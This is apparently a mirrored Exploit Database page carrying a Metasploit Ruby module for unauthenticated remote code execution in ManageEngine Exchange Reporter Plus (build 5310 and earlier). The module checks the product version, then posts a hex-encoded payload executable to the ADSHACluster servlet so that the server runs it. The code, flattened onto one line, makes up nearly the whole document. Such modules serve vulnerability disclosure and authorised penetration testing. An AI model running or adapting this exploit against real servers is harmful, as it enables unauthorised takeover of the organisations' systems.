Manage Engine Exchange Reporter Plus – Remote Code Execution (Metasploit)

• Exploit Database
• 98 阅读

• 作者： Metasploit
  日期： 2018-07-13
• 类别：

  • remote
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/45018/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92

  ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   class MetasploitModule< Msf::Exploit::Remote Rank = ExcellentRanking   include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE   def initialize(info = {}) super(update_info(info, &apos;Name&apos; => &apos;Manage Engine Exchange Reporter Plus Unauthenticated RCE&apos;, &apos;Description&apos;=> %q{ This module exploits a remote code execution vulnerability that exists in Exchange Reporter Plus <= 5310, caused by execution of bcp.exe file inside ADSHACluster servlet }, &apos;License&apos;=> MSF_LICENSE, &apos;Author&apos; => [ &apos;Kacper Szurek <kacperszurek@gmail.com>&apos; ], &apos;References&apos; => [ [&apos;URL&apos;, &apos;https://security.szurek.pl/manage-engine-exchange-reporter-plus-unauthenticated-rce.html&apos;] ], &apos;Platform&apos; => [&apos;win&apos;], &apos;Arch&apos; => [ARCH_X86, ARCH_X64], &apos;Targets&apos;=> [[&apos;Automatic&apos;, {}]], &apos;DisclosureDate&apos; => &apos;Jun 28 2018&apos;, &apos;DefaultTarget&apos;=> 0))   register_options( [ OptString.new(&apos;TARGETURI&apos;, [ true, &apos;The URI of the application&apos;, &apos;/&apos;]), Opt::RPORT(8181), ])   end   def bin_to_hex(s) s.each_byte.map { |b| b.to_s(16).rjust(2,&apos;0&apos;) }.join end   def check res = send_request_cgi({ &apos;method&apos; => &apos;POST&apos;, &apos;uri&apos;=> normalize_uri(target_uri.path, &apos;exchange&apos;, &apos;servlet&apos;, &apos;GetProductVersion&apos;) })   unless res vprint_error &apos;Connection failed&apos; return CheckCode::Safe end   unless res.code == 200 vprint_status &apos;Target is not Manage Engine Exchange Reporter Plus&apos; return CheckCode::Safe end   begin json = res.get_json_document raise if json.empty? || !json[&apos;BUILD_NUMBER&apos;] rescue vprint_status &apos;Target is not Manage Engine Exchange Reporter Plus&apos; return CheckCode::Safe end   vprint_status "Version: #{json[&apos;BUILD_NUMBER&apos;]}"   if json[&apos;BUILD_NUMBER&apos;].to_i <= 5310 return CheckCode::Appears end   CheckCode::Safe end   def exploit res = send_request_cgi({ &apos;method&apos;=> &apos;POST&apos;, &apos;uri&apos; => normalize_uri(target_uri.path, &apos;exchange&apos;, &apos;servlet&apos;, &apos;ADSHACluster&apos;), &apos;vars_post&apos; => { &apos;MTCALL&apos;=> "nativeClient", &apos;BCP_RLL&apos; => "0102", &apos;BCP_EXE&apos; => bin_to_hex(generate_payload_exe) } }) end end